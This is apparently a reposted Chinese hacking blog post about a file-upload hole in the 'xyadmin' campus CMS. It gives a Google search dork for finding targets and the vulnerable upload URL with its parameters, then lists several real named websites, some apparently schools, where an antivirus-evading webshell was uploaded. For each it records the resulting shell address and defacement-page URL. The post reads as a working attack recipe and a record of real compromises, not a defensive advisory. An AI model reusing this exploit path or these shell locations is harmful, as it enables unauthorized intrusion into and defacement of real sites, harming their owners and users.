您的位置:首页 > 其它

由校园网CMS系统(xyadmin)上传漏洞想到的

2011-05-28 08:08 1086 查看
由校园网CMS系统(xyadmin)上传漏洞想到的
2009-09-27 04:27
校园网CMS系统(xyadmin)上传漏洞
google关键字:inurl:xyadmin
我们的工具还是g.cn google hack
我们随便点一个连接看看
这个是上传页面xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
传马拿shell
xyadmin是校园的缩写
那么其他的如xxadmin可否呢?
http://rnx.tjuci.edu.cn/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg

window.opener.document.baseinfoform.logol.value='xyadmin/baseinfo/sam美化实用免杀大马.asp'
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
http://www.dslsxx.cn/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
shell地址http://www.dslsxx.cn/xyadmin/baseinfo/conn.asp
黑页http://www.dslsxx.cn/conn.asp



http://www.hnaues.com/sutuo/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
遇到
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
找不到路径~~~

http://jpkc.aqvtc.cn:8081/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
window.opener.document.baseinfoform.logol.value=
'xyadmin/baseinfo/conn.asa'
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
http://jpkc.aqvtc.cn:8081这个网站
http://jpkc.aqvtc.cn:8081/xyadmin/baseinfo/conn.asa
黑页http://jpkc.aqvtc.cn:8081/conn.asp



http://www.hssxfl.com/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
http://www.lbkjb.com/xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg
window.opener.document.baseinfoform.logol.value=
'xyadmin/baseinfo/conn.asa'
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
shell地址http://www.lbkjb.com/xyadmin/baseinfo/conn.asa
黑页地址http://www.lbkjb.com/EDW.asp



内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航